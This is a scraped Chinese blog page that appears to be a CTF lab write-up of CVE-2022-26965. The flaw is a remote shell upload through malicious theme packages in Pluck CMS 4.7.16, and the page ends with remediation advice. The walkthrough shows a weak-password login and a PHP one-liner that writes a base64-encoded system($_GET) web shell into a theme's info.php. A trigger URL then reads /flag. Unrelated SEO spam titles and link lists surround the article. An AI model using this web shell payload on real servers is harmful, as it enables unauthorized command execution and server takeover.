当前位置: 首页 > news >正文

建设通怎么样性价比高的seo网站优化

建设通怎么样,性价比高的seo网站优化,国家知识产权局专利缴费,北戴河网站建设简介 CVE-2022-26965是Pluck CMS 4.7.16版本存在一个远程shell上传执行漏洞。 攻击者可利用此漏洞通过构造恶意的主题包进行上传并执行,未经授权访问服务器,造成潜在的安全隐患。 过程 1.打开环境,查看源码,发现login.php 2.进…

简介

CVE-2022-26965是Pluck CMS 4.7.16版本存在一个远程shell上传执行漏洞

攻击者可利用此漏洞通过构造恶意的主题包进行上传并执行,未经授权访问服务器,造成潜在的安全隐患。

过程

1.打开环境,查看源码,发现login.php

2.进入查看,登陆页面,弱口令admin进行登录,全英文界面,可以翻译的哈

3.找到上传cms主题界面

4.去github下载相对应的版本主题,随便下载一个就行

https://github.com/billcreswell/redline-theme

5.下载完成之后将文件里面的info.php里面的内容修改为下面的代码

<?phpfile_put_contents('testshell.php',base64_decode('PD9waHAgc3lzdGVtKCRfR0VUWzFdKTs/Pg=='));?>

解释:使用file_put_contents函数将经过Base64解码后的字符串写入一个名为testshell.php的文件。

6.修改好的文件进行上传

文件上传成功。

7.连接

http://eci-2ze33y4rj8565dqp15iy.cloudeci1.ichunqiu.com/testshell.php?1=cat%20/flag

成功。

解决方案

这个漏洞的解决方案是升级Pluck CMS到最新版本或打上已知的修补程序。

攻击者利用该漏洞一般会执行一些恶意代码,包括上传一些特定的主题包,然后执行一些远程命令,从而获取服务器的控制权限,因此升级或打上修补程序是解决该漏洞最直接有效的方法。

除此之外,管理员还可以通过限制主题包的上传权限、对服务器进行安全扫描和加固等措施来提高系统的安全性。

http://www.15wanjia.com/news/19983.html

相关文章:

  • 运城哪家做网站的公司好百度seo优化推广
  • 如何用电脑记事本做网站seo创业
  • 深圳做网站网络营销公司山西seo优化公司
  • 北京做网络优化的公司seo优化网站百度技术
  • 济南做网站的公司能让手机流畅到爆的软件
  • 海阳市住房和城乡建设局官方网站视频互联网推广选择隐迅推
  • 做公司网站都需要什么资料百度售后电话人工服务
  • 中国10大品牌装修公司上海seo推广服务
  • 长沙企业网站建设公网站免费建站app
  • 安徽房地产网站建设百度指数批量查询
  • html前端网站开发PPT网络营销软件排行
  • wordpress在线阅读pdf网站优化排名技巧
  • 领域网站建设seo外包推广
  • 怎么在ps做网站首页建立网站需要什么
  • 网站无法添加图片百度推广助手官方下载
  • 网站建设企业推荐广西网站建设制作
  • 多备份 wordpress网站内容seo
  • 什么是网站建设需求谷歌搜索引擎入口2022
  • 阜新百姓网免费发布信息关键词排名优化工具
  • 建站模板怎么选seo 优化技术难度大吗
  • 行政单位单位网站建设温州seo结算
  • 网站制作加盟营销推广渠道
  • 有哪些网站是用vue做的可口可乐软文营销案例
  • 网站如何调用数据库seo软件资源
  • 行业门户网站模板百度快速排名技术培训教程
  • 衢州网站建设专业的公司泰州百度关键词优化
  • 网站开发费用计入什么二级科目电脑零基础培训班
  • 做网站便宜的公司营销型网站的特点
  • 运城做网站哪家好seo优化工具软件
  • 怎样做艾条艾柱网站企业网站设计图片